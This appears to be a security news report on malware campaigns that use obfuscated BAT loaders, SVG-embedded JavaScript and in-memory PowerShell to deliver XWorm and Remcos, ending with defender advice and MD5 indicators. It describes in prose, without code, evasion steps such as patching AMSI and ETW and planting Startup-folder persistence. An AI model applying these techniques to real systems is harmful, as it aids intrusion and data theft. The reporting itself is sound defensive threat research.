Recent threat campaigns have revealed an evolving use of BAT-based loaders to deliver Remote Access Trojans (RATs), including XWorm and Remcos.
These campaigns typically begin with a ZIP archive—often hosted on seemingly legitimate platforms such as ImgKit—designed to entice user interaction by mimicking benign content. Once opened, the archive unpacks a highly obfuscated BAT script that orchestrates the rest of the infection chain.
Upon extraction, the ZIP file drops a BAT script that employs multiple layers of obfuscation to evade static detection engines.
When executed, this script spins up a PowerShell-based loader that injects the RAT payload directly into memory, achieving fileless execution to bypass traditional endpoint defenses.
Security researchers have documented two primary delivery methods: as an email attachment within an EML file and via a URL pointing to ImgKit.
The flexibility in distribution channels suggests threat actors are iterating on their delivery tactics to maximize infection rates.
The BAT script also achieves persistence by planting a copy in the Windows Startup folder, ensuring that the malicious payload executes on each system reboot or user logon.
This simple yet effective persistence mechanism complements the fileless injection model, making detection and remediation significantly more challenging.
A notable advancement in Campaign 2 is the adoption of SVG (Scalable Vector Graphics) files as an initial access vector.
Embedded within these SVGs is malicious JavaScript code that triggers the automatic download of the same ZIP archive used in earlier campaigns.
When rendered in vulnerable applications or previewed in phishing pages, the SVG’s script silently initiates the download without any user prompt, effectively weaponizing an image file traditionally considered safe.
By exploiting the scripting capabilities of SVGs, attackers can slip past perimeter defenses that typically exclude image formats from deep content inspection.
Once the ZIP archive is in place, the infection chain mirrors that of Campaign 1: execution of the obfuscated BAT loader, in-memory PowerShell injection, and eventual deployment of the RAT payload.
PowerShell Injection and Evasion
The PowerShell loader itself is a two-stage script delivered as a Base64-encoded, command-line argument.
The first stage locates and decodes Base64 data embedded as a comment in a BAT file within the user’s profile directory.
Upon decoding, the script uses .NET reflection and dynamic delegates to patch two critical Windows defenses in memory: the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW).
By overwriting the AmsiScanBuffer and EtwEventWrite functions with no-op instructions, the loader disables real-time scanning and event logging, allowing subsequent malicious activity to proceed undetected.
The second stage extracts two encrypted .NET assemblies from the same BAT file. These assemblies undergo Base64 decoding, AES decryption with a hardcoded key and IV, and GZIP decompression.
Loaded directly into memory via Assembly.Load, the first assembly executes immediately, while the second receives simulated command-line arguments to unleash its full functionality—most critically, launching XWorm or Remcos.
Loader Capabilities and Final Payload
Multiple loader variants have been identified, some loading .NET executables and others decrypting shellcode for direct execution via VirtualProtect and Marshal delegates.
Regardless of variant, their common objectives are the same: evade detection, disable logging, load payloads in memory, and achieve persistence.
XWorm and Remcos, the final payloads, are among the most potent RATs in circulation. Both support keylogging, remote command execution, file manipulation, screenshot capture, and data exfiltration.
Combined with the stealthy loader techniques and non-traditional delivery formats, these campaigns represent a significant escalation in RAT distribution methodologies.
These campaigns underscore the growing trend of fileless malware, script obfuscation, and non-traditional delivery formats.
Defenders should adopt behavioral detection solutions, enforce rigorous content inspection for all file types—including SVG—and bolster user awareness training to spot suspicious attachments and links.
Endpoint protection platforms must evolve to monitor in-memory execution patterns and detect anomalous PowerShell activity to stay ahead of these sophisticated threats.
Indicators of Compromise
Here is the table with the provided MD5 hashes, associated file types, and malware family names:
| MD5 Hash | File Type | Malware/Family |
|---|---|---|
| EDA018A9D51F3B09C20E88A15F630DF5 | File | Unknown |
| 23E30938E00F89BF345C9C1E58A6CC1D | BAT | Unknown |
| 1CE36351D7175E9244209AE0D42759D9 | JS | Unknown |
| EC04BC20CA447556C3BDCFCBF6662C60 | LOADER | Unknown |
| D439CB98CF44D359C6ABCDDDB6E85454 | XWorm | Remote Access Trojan (RAT) |
| [Not Provided] | REMCOS | Remote Control Malware (RAT) |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
Source link
